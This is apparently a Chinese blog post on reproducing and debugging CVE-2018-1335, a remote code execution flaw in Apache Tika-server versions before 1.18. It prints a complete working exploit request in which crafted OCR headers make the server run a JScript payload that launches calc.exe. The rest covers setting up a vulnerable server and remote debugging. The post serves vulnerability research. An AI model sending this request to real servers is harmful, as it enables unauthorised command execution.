Apache Tika-server RCE(CVE-2018-1335)

213 篇文章 3 订阅

PoC:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335

PUT /meta HTTP/1.1
Host: cqq.com:9998
Connection: close
User-Agent: python-requests/2.19.1
X-Tika-OCRTesseractPath: "cscript"
Content-type: image/jp2
Expect: 100-continue
X-Tika-OCRLanguage: //E:Jscript
Content-Length: 98

var oShell = WScript.CreateObject("WScript.Shell");
	var oExec = oShell.Exec('cmd /c calc.exe');

分析:https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/

只在Windows上复现。
< 1.18 server
下载:https://archive.apache.org/dist/tika/tika-server-1.17.jar
启动:

java -jar tika-server-1.17.jar

在这里插入图片描述

调试

照例按照之前远程调试的经验,设置参数启动tika-server:

$ java -Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346 -jar ./target/tika-server-1.17.jar  -h 192.168.170.139

在这里插入图片描述
如图,当Idea中点击调试按钮之后就会连接到该端口。
然后在intelli Idea引入server目录,以及parser目录(因为会用到),不然调试的时候跟不到那个源码部分。

然后在右下角允许maven同步,需要下载一些依赖包,方便调试源码。
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值